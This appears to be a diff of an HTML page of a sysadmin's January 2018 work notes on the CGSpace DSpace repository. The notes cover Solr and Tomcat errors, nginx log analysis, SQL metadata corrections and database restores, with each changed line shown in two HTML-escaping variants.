;f.group_map.separator=%7C&amp;f.group_map.encapsulator=%22&amp;f.owningColl.split=true&amp;f.owningColl.separator=%7C&amp;f.owningColl.encapsulator=%22&amp;f.p_group_id.split=true&amp;f.p_group_id.separator=%7C&amp;f.p_group_id.encapsulator=%22&amp;f.p_group_name.split=true&amp;f.p_group_name.separator=%7C&amp;f.p_group_name.encapsulator=%22&amp;wt=javabin&amp;version=2 HTTP/1.1&quot; 409 156
<pre tabindex="0"><code>127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] &#34;GET /solr/statistics/select?q=type%3A2+AND+id%3A1&amp;wt=javabin&amp;version=2 HTTP/1.1&#34; 200 107
127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] &#34;GET /solr/statistics/select?q=*%3A*&amp;rows=0&amp;facet=true&amp;facet.range=time&amp;facet.range.start=NOW%2FYEAR-18YEARS&amp;facet.range.end=NOW%2FYEAR%2B0YEARS&amp;facet.range.gap=%2B1YEAR&amp;facet.mincount=1&amp;wt=javabin&amp;version=2 HTTP/1.1&#34; 200 447
127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] &#34;GET /solr/admin/cores?action=STATUS&amp;core=statistics-2016&amp;indexInfo=true&amp;wt=javabin&amp;version=2 HTTP/1.1&#34; 200 76
127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] &#34;GET /solr/admin/cores?action=CREATE&amp;name=statistics-2016&amp;instanceDir=statistics&amp;dataDir=%2FUsers%2Faorth%2Fdspace%2Fsolr%2Fstatistics-2016%2Fdata&amp;wt=javabin&amp;version=2 HTTP/1.1&#34; 200 63
127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] &#34;GET /solr/statistics/select?csv.mv.separator=%7C&amp;q=*%3A*&amp;fq=time%3A%28%5B2016%5C-01%5C-01T00%5C%3A00%5C%3A00Z+TO+2017%5C-01%5C-01T00%5C%3A00%5C%3A00Z%5D+NOT+2017%5C-01%5C-01T00%5C%3A00%5C%3A00Z%29&amp;rows=10000&amp;wt=csv HTTP/1.1&#34; 200 2137630
127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] &#34;GET /solr/statistics/admin/luke?show=schema&amp;wt=javabin&amp;version=2 HTTP/1.1&#34; 200 16253
127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] &#34;POST /solr//statistics-2016/update/csv?commit=true&amp;softCommit=false&amp;waitSearcher=true&amp;f.previousWorkflowStep.split=true&amp;f.previousWorkflowStep.separator=%7C&amp;f.previousWorkflowStep.encapsulator=%22&amp;f.actingGroupId.split=true&amp;f.actingGroupId.separator=%7C&amp;f.actingGroupId.encapsulator=%22&amp;f.containerCommunity.split=true&amp;f.containerCommunity.separator=%7C&amp;f.containerCommunity.encapsulator=%22&amp;f.range.split=true&amp;f.range.separator=%7C&amp;f.range.encapsulator=%22&amp;f.containerItem.split=true&amp;f.containerItem.separator=%7C&amp;f.containerItem.encapsulator=%22&amp;f.p_communities_map.split=true&amp;f.p_communities_map.separator=%7C&amp;f.p_communities_map.encapsulator=%22&amp;f.ngram_query_search.split=true&amp;f.ngram_query_search.separator=%7C&amp;f.ngram_query_search.encapsulator=%22&amp;f.containerBitstream.split=true&amp;f.containerBitstream.separator=%7C&amp;f.containerBitstream.encapsulator=%22&amp;f.owningItem.split=true&amp;f.owningItem.separator=%7C&amp;f.owningItem.encapsulator=%22&amp;f.actingGroupParentId.split=true&amp;f.actingGroupParentId.separator=%7C&amp;f.actingGroupParentId.encapsulator=%22&amp;f.text.split=true&amp;f.text.separator=%7C&amp;f.text.encapsulator=%22&amp;f.simple_query_search.split=true&amp;f.simple_query_search.separator=%7C&amp;f.simple_query_search.encapsulator=%22&amp;f.owningComm.split=true&amp;f.owningComm.separator=%7C&amp;f.owningComm.encapsulator=%22&amp;f.owner.split=true&amp;f.owner.separator=%7C&amp;f.owner.encapsulator=%22&amp;f.filterquery.split=true&amp;f.filterquery.separator=%7C&amp;f.filterquery.encapsulator=%22&amp;f.p_group_map.split=true&amp;f.p_group_map.separator=%7C&amp;f.p_group_map.encapsulator=%22&amp;f.actorMemberGroupId.split=true&amp;f.actorMemberGroupId.separator=%7C&amp;f.actorMemberGroupId.encapsulator=%22&amp;f.bitstreamId.split=true&amp;f.bitstreamId.separator=%7C&amp;f.bitstreamId.encapsulator=%22&amp;f.group_name.split=true&amp;f.group_name.separator=%7C&amp;f.group_name.encapsulator=%22&amp;f.p_communities_name.split=true&amp;f.p_communities_name.separator=%7C&amp;f.p_communities_name.encapsulator=%22&amp;f.query.split=true&amp;f.query.separator=%7C&amp;f.query.encapsulator=%22&amp;f.workflowStep.split=true&amp;f.workflowStep.separator=%7C&amp;f.workflowStep.encapsulator=%22&amp;f.containerCollection.split=true&amp;f.containerCollection.separator=%7C&amp;f.containerCollection.encapsulator=%22&amp;f.complete_query_search.split=true&amp;f.complete_query_search.separator=%7C&amp;f.complete_query_search.encapsulator=%22&amp;f.p_communities_id.split=true&amp;f.p_communities_id.separator=%7C&amp;f.p_communities_id.encapsulator=%22&amp;f.rangeDescription.split=true&amp;f.rangeDescription.separator=%7C&amp;f.rangeDescription.encapsulator=%22&amp;f.group_id.split=true&amp;f.group_id.separator=%7C&amp;f.group_id.encapsulator=%22&amp;f.bundleName.split=true&amp;f.bundleName.separator=%7C&amp;f.bundleName.encapsulator=%22&amp;f.ngram_simplequery_search.split=true&amp;f.ngram_simplequery_search.separator=%7C&amp;f.ngram_simplequery_search.encapsulator=%22&amp;f.group_map.split=true&amp;f.group_map.separator=%7C&amp;f.group_map.encapsulator=%22&amp;f.owningColl.split=true&amp;f.owningColl.separator=%7C&amp;f.owningColl.encapsulator=%22&amp;f.p_group_id.split=true&amp;f.p_group_id.separator=%7C&amp;f.p_group_id.encapsulator=%22&amp;f.p_group_name.split=true&amp;f.p_group_name.separator=%7C&amp;f.p_group_name.encapsulator=%22&amp;wt=javabin&amp;version=2 HTTP/1.1&#34; 409 156
</code></pre><ul>
<li>The new core is created but when DSpace attempts to POST to it there is an HTTP 409 error</li>
<li>This is apparently a common Solr error code that means &ldquo;version conflict&rdquo;: <a href="http://yonik.com/solr/optimistic-concurrency/">http://yonik.com/solr/optimistic-concurrency/</a></li>
<li>Looks like that bot from the PerfectIP.net host ended up making about 450,000 requests to XMLUI alone yesterday:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep &quot;Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36&quot; | grep &quot;10/Jan/2018&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep &#34;Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36&#34; | grep &#34;10/Jan/2018&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
21572 70.36.107.50
30722 70.36.107.190
34566 70.36.107.49
@ -659,18 +659,18 @@ cache_alignment : 64
</code></pre><ul>
<li>Wow, I just figured out how to set the application name of each database pool in the JNDI config of Tomcat&rsquo;s <code>server.xml</code>:</li>
</ul>
<pre tabindex="0"><code>&lt;Resource name=&quot;jdbc/dspaceWeb&quot; auth=&quot;Container&quot; type=&quot;javax.sql.DataSource&quot;
driverClassName=&quot;org.postgresql.Driver&quot;
url=&quot;jdbc:postgresql://localhost:5432/dspacetest?ApplicationName=dspaceWeb&quot;
username=&quot;dspace&quot;
password=&quot;dspace&quot;
initialSize='5'
maxActive='75'
maxIdle='15'
minIdle='5'
maxWait='5000'
validationQuery='SELECT 1'
testOnBorrow='true' /&gt;
<pre tabindex="0"><code>&lt;Resource name=&#34;jdbc/dspaceWeb&#34; auth=&#34;Container&#34; type=&#34;javax.sql.DataSource&#34;
driverClassName=&#34;org.postgresql.Driver&#34;
url=&#34;jdbc:postgresql://localhost:5432/dspacetest?ApplicationName=dspaceWeb&#34;
username=&#34;dspace&#34;
password=&#34;dspace&#34;
initialSize=&#39;5&#39;
maxActive=&#39;75&#39;
maxIdle=&#39;15&#39;
minIdle=&#39;5&#39;
maxWait=&#39;5000&#39;
validationQuery=&#39;SELECT 1&#39;
testOnBorrow=&#39;true&#39; /&gt;
</code></pre><ul>
<li>So theoretically I could name each connection &ldquo;xmlui&rdquo; or &ldquo;dspaceWeb&rdquo; or something meaningful and it would show up in PostgreSQL&rsquo;s <code>pg_stat_activity</code> table!</li>
<li>This would be super helpful for figuring out where load was coming from (now I wonder if I could figure out how to graph this)</li>
@ -686,16 +686,16 @@ cache_alignment : 64
<li>I&rsquo;m looking at the <a href="https://wiki.lyrasis.org/display/DSDOC6x/Installing+DSpace#InstallingDSpace-ServletEngine(ApacheTomcat7orlater,Jetty,CauchoResinorequivalent)">DSpace 6.0 Install docs</a> and notice they tweak the number of threads in their Tomcat connector:</li>
</ul>
<pre tabindex="0"><code>&lt;!-- Define a non-SSL HTTP/1.1 Connector on port 8080 --&gt;
&lt;Connector port=&quot;8080&quot;
maxThreads=&quot;150&quot;
minSpareThreads=&quot;25&quot;
maxSpareThreads=&quot;75&quot;
enableLookups=&quot;false&quot;
redirectPort=&quot;8443&quot;
acceptCount=&quot;100&quot;
connectionTimeout=&quot;20000&quot;
disableUploadTimeout=&quot;true&quot;
URIEncoding=&quot;UTF-8&quot;/&gt;
&lt;Connector port=&#34;8080&#34;
maxThreads=&#34;150&#34;
minSpareThreads=&#34;25&#34;
maxSpareThreads=&#34;75&#34;
enableLookups=&#34;false&#34;
redirectPort=&#34;8443&#34;
acceptCount=&#34;100&#34;
connectionTimeout=&#34;20000&#34;
disableUploadTimeout=&#34;true&#34;
URIEncoding=&#34;UTF-8&#34;/&gt;
</code></pre><ul>
<li>In Tomcat 8.5 the <code>maxThreads</code> defaults to 200 which is probably fine, but tweaking <code>minSpareThreads</code> could be good</li>
<li>I don&rsquo;t see a setting for <code>maxSpareThreads</code> in the docs so that might be an error</li>
@ -711,8 +711,8 @@ cache_alignment : 64
<li>Still testing DSpace 6.2 on Tomcat 8.5.24</li>
<li>Catalina errors at Tomcat 8.5 startup:</li>
</ul>
<pre tabindex="0"><code>13-Jan-2018 13:59:05.245 WARNING [main] org.apache.tomcat.dbcp.dbcp2.BasicDataSourceFactory.getObjectInstance Name = dspace6 Property maxActive is not used in DBCP2, use maxTotal instead. maxTotal default value is 8. You have set value of &quot;35&quot; for &quot;maxActive&quot; property, which is being ignored.
13-Jan-2018 13:59:05.245 WARNING [main] org.apache.tomcat.dbcp.dbcp2.BasicDataSourceFactory.getObjectInstance Name = dspace6 Property maxWait is not used in DBCP2 , use maxWaitMillis instead. maxWaitMillis default value is -1. You have set value of &quot;5000&quot; for &quot;maxWait&quot; property, which is being ignored.
<pre tabindex="0"><code>13-Jan-2018 13:59:05.245 WARNING [main] org.apache.tomcat.dbcp.dbcp2.BasicDataSourceFactory.getObjectInstance Name = dspace6 Property maxActive is not used in DBCP2, use maxTotal instead. maxTotal default value is 8. You have set value of &#34;35&#34; for &#34;maxActive&#34; property, which is being ignored.
13-Jan-2018 13:59:05.245 WARNING [main] org.apache.tomcat.dbcp.dbcp2.BasicDataSourceFactory.getObjectInstance Name = dspace6 Property maxWait is not used in DBCP2 , use maxWaitMillis instead. maxWaitMillis default value is -1. You have set value of &#34;5000&#34; for &#34;maxWait&#34; property, which is being ignored.
</code></pre><ul>
<li>I looked in my Tomcat 7.0.82 logs and I don&rsquo;t see anything about DBCP2 errors, so I guess this a Tomcat 8.0.x or 8.5.x thing</li>
<li>DBCP2 appears to be Tomcat 8.0.x and up according to the <a href="https://tomcat.apache.org/migration-8.html">Tomcat 8.0 migration guide</a></li>
@ -761,15 +761,15 @@ Caused by: java.lang.NullPointerException
<li>Help Udana from IWMI export a CSV from DSpace Test so he can start trying a batch upload</li>
<li>I&rsquo;m going to apply these ~130 corrections on CGSpace:</li>
</ul>
<pre tabindex="0"><code>update metadatavalue set text_value='Formally Published' where resource_type_id=2 and metadata_field_id=214 and text_value like 'Formally published';
delete from metadatavalue where resource_type_id=2 and metadata_field_id=214 and text_value like 'NO';
update metadatavalue set text_value='en' where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(En|English)';
update metadatavalue set text_value='fr' where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(fre|frn|French)';
update metadatavalue set text_value='es' where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(Spanish|spa)';
update metadatavalue set text_value='vi' where resource_type_id=2 and metadata_field_id=38 and text_value='Vietnamese';
update metadatavalue set text_value='ru' where resource_type_id=2 and metadata_field_id=38 and text_value='Ru';
update metadatavalue set text_value='in' where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(IN|In)';
delete from metadatavalue where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(dc.language.iso|CGIAR Challenge Program on Water and Food)';
<pre tabindex="0"><code>update metadatavalue set text_value=&#39;Formally Published&#39; where resource_type_id=2 and metadata_field_id=214 and text_value like &#39;Formally published&#39;;
delete from metadatavalue where resource_type_id=2 and metadata_field_id=214 and text_value like &#39;NO&#39;;
update metadatavalue set text_value=&#39;en&#39; where resource_type_id=2 and metadata_field_id=38 and text_value ~ &#39;(En|English)&#39;;
update metadatavalue set text_value=&#39;fr&#39; where resource_type_id=2 and metadata_field_id=38 and text_value ~ &#39;(fre|frn|French)&#39;;
update metadatavalue set text_value=&#39;es&#39; where resource_type_id=2 and metadata_field_id=38 and text_value ~ &#39;(Spanish|spa)&#39;;
update metadatavalue set text_value=&#39;vi&#39; where resource_type_id=2 and metadata_field_id=38 and text_value=&#39;Vietnamese&#39;;
update metadatavalue set text_value=&#39;ru&#39; where resource_type_id=2 and metadata_field_id=38 and text_value=&#39;Ru&#39;;
update metadatavalue set text_value=&#39;in&#39; where resource_type_id=2 and metadata_field_id=38 and text_value ~ &#39;(IN|In)&#39;;
delete from metadatavalue where resource_type_id=2 and metadata_field_id=38 and text_value ~ &#39;(dc.language.iso|CGIAR Challenge Program on Water and Food)&#39;;
</code></pre><ul>
<li>Continue proofing Peter&rsquo;s author corrections that I started yesterday, faceting on non blank, non flagged, and briefly scrolling through the values of the corrections to find encoding errors for French and Spanish names</li>
</ul>
@ -777,17 +777,17 @@ delete from metadatavalue where resource_type_id=2 and metadata_field_id=38 and
<ul>
<li>Apply corrections using <a href="https://gist.github.com/alanorth/df92cbfb54d762ba21b28f7cd83b6897">fix-metadata-values.py</a>:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-01-14-Authors-1300-Corrections.csv -f dc.contributor.author -t correct -m 3 -d dspace-u dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-01-14-Authors-1300-Corrections.csv -f dc.contributor.author -t correct -m 3 -d dspace-u dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>In looking at some of the values to delete or check I found some metadata values that I could not resolve their handle via SQL:</li>
</ul>
<pre tabindex="0"><code>dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value='Tarawali';
<pre tabindex="0"><code>dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value=&#39;Tarawali&#39;;
metadata_value_id | resource_id | metadata_field_id | text_value | text_lang | place | authority | confidence | resource_type_id
-------------------+-------------+-------------------+------------+-----------+-------+-----------+------------+------------------
2757936 | 4369 | 3 | Tarawali | | 9 | | 600 | 2
(1 row)
dspace=# select handle from item, handle where handle.resource_id = item.item_id AND item.item_id = '4369';
dspace=# select handle from item, handle where handle.resource_id = item.item_id AND item.item_id = &#39;4369&#39;;
handle
--------
(0 rows)
@ -796,7 +796,7 @@ dspace=# select handle from item, handle where handle.resource_id = item.item_id
<li>Otherwise, the <a href="https://wiki.lyrasis.org/display/DSPACE/Helper+SQL+functions+for+DSpace+5">DSpace 5 SQL Helper Functions</a> provide <code>ds5_item2itemhandle()</code>, which is much easier than my long query above that I always have to go search for</li>
<li>For example, to find the Handle for an item that has the author &ldquo;Erni&rdquo;:</li>
</ul>
<pre tabindex="0"><code>dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value='Erni';
<pre tabindex="0"><code>dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value=&#39;Erni&#39;;
metadata_value_id | resource_id | metadata_field_id | text_value | text_lang | place | authority | confidence | resource_type_id
-------------------+-------------+-------------------+------------+-----------+-------+--------------------------------------+------------+------------------
2612150 | 70308 | 3 | Erni | | 9 | 3fe10c68-6773-49a7-89cc-63eb508723f2 | -1 | 2
@ -809,16 +809,16 @@ dspace=# select ds5_item2itemhandle(70308);
</code></pre><ul>
<li>Next I apply the author deletions:</li>
</ul>
<pre tabindex="0"><code>$ ./delete-metadata-values.py -i /tmp/2018-01-14-Authors-5-Deletions.csv -f dc.contributor.author -m 3 -d dspace -u dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./delete-metadata-values.py -i /tmp/2018-01-14-Authors-5-Deletions.csv -f dc.contributor.author -m 3 -d dspace -u dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>Now working on the affiliation corrections from Peter:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-01-15-Affiliations-888-Corrections.csv -f cg.contributor.affiliation -t correct -m 211 -d dspace -u dspace -p 'fuuu'
$ ./delete-metadata-values.py -i /tmp/2018-01-15-Affiliations-11-Deletions.csv -f cg.contributor.affiliation -m 211 -d dspace -u dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-01-15-Affiliations-888-Corrections.csv -f cg.contributor.affiliation -t correct -m 211 -d dspace -u dspace -p &#39;fuuu&#39;
$ ./delete-metadata-values.py -i /tmp/2018-01-15-Affiliations-11-Deletions.csv -f cg.contributor.affiliation -m 211 -d dspace -u dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>Now I made a new list of affiliations for Peter to look through:</li>
</ul>
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where metadata_schema_id = 2 and element = 'contributor' and qualifier = 'affiliation') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/affiliations.csv with csv;
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where metadata_schema_id = 2 and element = &#39;contributor&#39; and qualifier = &#39;affiliation&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/affiliations.csv with csv;
COPY 4552
</code></pre><ul>
<li>Looking over the affiliations again I see dozens of CIAT ones with their affiliation formatted like: International Center for Tropical Agriculture (CIAT)</li>
@ -832,7 +832,7 @@ COPY 4552
</code></pre><ul>
<li>Looks like we processed 2.9 million requests on CGSpace in 2017-12:</li>
</ul>
<pre tabindex="0"><code># time zcat --force /var/log/nginx/* | grep -cE &quot;[0-9]{1,2}/Dec/2017&quot;
<pre tabindex="0"><code># time zcat --force /var/log/nginx/* | grep -cE &#34;[0-9]{1,2}/Dec/2017&#34;
2890041
real 0m25.756s
@ -845,7 +845,7 @@ sys 0m2.210s
<li>Discuss standardized names for CRPs and centers with ICARDA (don&rsquo;t wait for CG Core)</li>
<li>Re-send DC rights implementation and forward to everyone so we can move forward with it (without the URI field for now)</li>
<li>Start looking at where I was with the AGROVOC API</li>
<li>Have a controlled vocabulary for CGIAR authors' names and ORCIDs? Perhaps values like: Orth, Alan S. (0000-0002-1735-7458)</li>
<li>Have a controlled vocabulary for CGIAR authors&rsquo; names and ORCIDs? Perhaps values like: Orth, Alan S. (0000-0002-1735-7458)</li>
<li>Need to find the metadata field name that ICARDA is using for their ORCIDs</li>
<li>Update text for DSpace version plan on wiki</li>
<li>Come up with an SLA, something like: <em>In return for your contribution we will, to the best of our ability, ensure 99.5% (&ldquo;two and a half nines&rdquo;) uptime of CGSpace, ensure data is stored in open formats and safely backed up, follow CG Core metadata standards, &hellip;</em></li>
@ -864,14 +864,14 @@ sys 0m2.210s
<li>Also, there are whitespace issues in many columns, and the items are mapped to the LIVES and ILRI articles collections, not Theses</li>
<li>In any case, importing them like this:</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx512m -XX:+TieredCompilation -XX:TieredStopAtLevel=1&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx512m -XX:+TieredCompilation -XX:TieredStopAtLevel=1&#34;
$ dspace import -a -e aorth@mjanja.ch -s /tmp/2018-01-16\ LIVES/SimpleArchiveFormat -m lives.map &amp;&gt; lives.log
</code></pre><ul>
<li>And fantastic, before I started the import there were 10 PostgreSQL connections, and then CGSpace crashed during the upload</li>
<li>When I looked there were 210 PostgreSQL connections!</li>
<li>I don&rsquo;t see any high load in XMLUI or REST/OAI:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &quot;17/Jan/2018&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &#34;17/Jan/2018&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
381 40.77.167.124
403 213.55.99.121
431 207.46.13.60
@ -882,7 +882,7 @@ $ dspace import -a -e aorth@mjanja.ch -s /tmp/2018-01-16\ LIVES/SimpleArchiveFor
593 54.91.48.104
757 104.196.152.243
776 66.249.66.90
# cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &quot;17/Jan/2018&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
# cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &#34;17/Jan/2018&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
11 205.201.132.14
11 40.77.167.124
15 35.226.23.240
@ -906,7 +906,7 @@ $ dspace import -a -e aorth@mjanja.ch -s /tmp/2018-01-16\ LIVES/SimpleArchiveFor
[====================&gt; ]40% time remaining: 7 hour(s) 14 minute(s) 45 seconds. timestamp: 2018-01-17 07:57:11
[====================&gt; ]40% time remaining: 7 hour(s) 14 minute(s) 44 seconds. timestamp: 2018-01-17 07:57:37
[====================&gt; ]40% time remaining: 7 hour(s) 16 minute(s) 5 seconds. timestamp: 2018-01-17 07:57:49
Exception in thread &quot;http-bio-127.0.0.1-8081-exec-627&quot; java.lang.OutOfMemoryError: Java heap space
Exception in thread &#34;http-bio-127.0.0.1-8081-exec-627&#34; java.lang.OutOfMemoryError: Java heap space
at org.apache.lucene.util.FixedBitSet.clone(FixedBitSet.java:576)
at org.apache.solr.search.BitDocSet.andNot(BitDocSet.java:222)
at org.apache.solr.search.SolrIndexSearcher.getProcessedFilter(SolrIndexSearcher.java:1067)
@ -1004,7 +1004,7 @@ $ docker run --network dspace-build --name artifactory -d -v artifactory5_data:/
<li>I don&rsquo;t see any errors in the nginx or catalina logs, so I guess UptimeRobot just got impatient and closed the request, which caused nginx to send an HTTP 499</li>
<li>I realize I never did a full re-index after the SQL author and affiliation updates last week, so I should force one now:</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx1024m -XX:+TieredCompilation -XX:TieredStopAtLevel=1&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1024m -XX:+TieredCompilation -XX:TieredStopAtLevel=1&#34;
$ time schedtool -D -e ionice -c2 -n7 nice -n19 /home/cgspace.cgiar.org/bin/dspace index-discovery -b
</code></pre><ul>
<li>Maria from Bioversity asked if I could remove the abstracts from all of their Limited Access items in the <a href="https://cgspace.cgiar.org/handle/10568/35501">Bioversity Journal Articles</a> collection</li>
@ -1026,7 +1026,7 @@ Jan 18 07:01:22 linode18 sudo[10812]: pam_unix(sudo:session): session opened for
<li>Linode alerted and said that the CPU load was 264.1% on CGSpace</li>
<li>Start the Discovery indexing again:</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx1024m -XX:+TieredCompilation -XX:TieredStopAtLevel=1&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1024m -XX:+TieredCompilation -XX:TieredStopAtLevel=1&#34;
$ time schedtool -D -e ionice -c2 -n7 nice -n19 /home/cgspace.cgiar.org/bin/dspace index-discovery -b
</code></pre><ul>
<li>Linode alerted again and said that CGSpace was using 301% CPU</li>
@ -1073,10 +1073,10 @@ sys 0m12.317s
</ul>
<pre tabindex="0"><code>$ docker exec dspace_db dropdb -U postgres dspace
$ docker exec dspace_db createdb -U postgres -O dspace --encoding=UNICODE dspace
$ docker exec dspace_db psql -U postgres dspace -c 'alter user dspace createuser;'
$ docker exec dspace_db psql -U postgres dspace -c &#39;alter user dspace createuser;&#39;
$ docker cp test.dump dspace_db:/tmp/test.dump
$ docker exec dspace_db pg_restore -U postgres -d dspace /tmp/test.dump
$ docker exec dspace_db psql -U postgres dspace -c 'alter user dspace nocreateuser;'
$ docker exec dspace_db psql -U postgres dspace -c &#39;alter user dspace nocreateuser;&#39;
$ docker exec dspace_db vacuumdb -U postgres dspace
$ docker cp ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspace_db:/tmp
$ docker exec dspace_db psql -U dspace -f /tmp/update-sequences.sql dspace
@ -1119,12 +1119,12 @@ $ ./rest-find-collections.py 10568/1 | grep -i untitled
<li>Thinking about generating a jmeter test plan for DSpace, along the lines of <a href="https://github.com/Georgetown-University-Libraries/dspace-performance-test">Georgetown&rsquo;s dspace-performance-test</a></li>
<li>I got a list of all the GET requests on CGSpace for January 21st (the last time Linode complained the load was high), excluding admin calls:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz /var/log/nginx/library-access.log.2.gz /var/log/nginx/library-access.log.3.gz /var/log/nginx/rest.log.2.gz /var/log/nginx/rest.log.3.gz /var/log/nginx/oai.log.2.gz /var/log/nginx/oai.log.3.gz /var/log/nginx/error.log.2.gz /var/log/nginx/error.log.3.gz | grep &quot;21/Jan/2018&quot; | grep &quot;GET &quot; | grep -c -v &quot;/admin&quot;
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz /var/log/nginx/library-access.log.2.gz /var/log/nginx/library-access.log.3.gz /var/log/nginx/rest.log.2.gz /var/log/nginx/rest.log.3.gz /var/log/nginx/oai.log.2.gz /var/log/nginx/oai.log.3.gz /var/log/nginx/error.log.2.gz /var/log/nginx/error.log.3.gz | grep &#34;21/Jan/2018&#34; | grep &#34;GET &#34; | grep -c -v &#34;/admin&#34;
56405
</code></pre><ul>
<li>Apparently about 28% of these requests were for bitstreams, 30% for the REST API, and 30% for handles:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz /var/log/nginx/library-access.log.2.gz /var/log/nginx/library-access.log.3.gz /var/log/nginx/rest.log.2.gz /var/log/nginx/rest.log.3.gz /var/log/nginx/oai.log.2.gz /var/log/nginx/oai.log.3.gz /var/log/nginx/error.log.2.gz /var/log/nginx/error.log.3.gz | grep &quot;21/Jan/2018&quot; | grep &quot;GET &quot; | grep -v &quot;/admin&quot; | awk '{print $7}' | grep -Eo &quot;^/(handle|bitstream|rest|oai)/&quot; | sort | uniq -c | sort -n
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz /var/log/nginx/library-access.log.2.gz /var/log/nginx/library-access.log.3.gz /var/log/nginx/rest.log.2.gz /var/log/nginx/rest.log.3.gz /var/log/nginx/oai.log.2.gz /var/log/nginx/oai.log.3.gz /var/log/nginx/error.log.2.gz /var/log/nginx/error.log.3.gz | grep &#34;21/Jan/2018&#34; | grep &#34;GET &#34; | grep -v &#34;/admin&#34; | awk &#39;{print $7}&#39; | grep -Eo &#34;^/(handle|bitstream|rest|oai)/&#34; | sort | uniq -c | sort -n
38 /oai/
14406 /bitstream/
15179 /rest/
@ -1132,14 +1132,14 @@ $ ./rest-find-collections.py 10568/1 | grep -i untitled
</code></pre><ul>
<li>And 3% were to the homepage or search:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz /var/log/nginx/library-access.log.2.gz /var/log/nginx/library-access.log.3.gz /var/log/nginx/rest.log.2.gz /var/log/nginx/rest.log.3.gz /var/log/nginx/oai.log.2.gz /var/log/nginx/oai.log.3.gz /var/log/nginx/error.log.2.gz /var/log/nginx/error.log.3.gz | grep &quot;21/Jan/2018&quot; | grep &quot;GET &quot; | grep -v &quot;/admin&quot; | awk '{print $7}' | grep -Eo '^/($|open-search|discover)' | sort | uniq -c
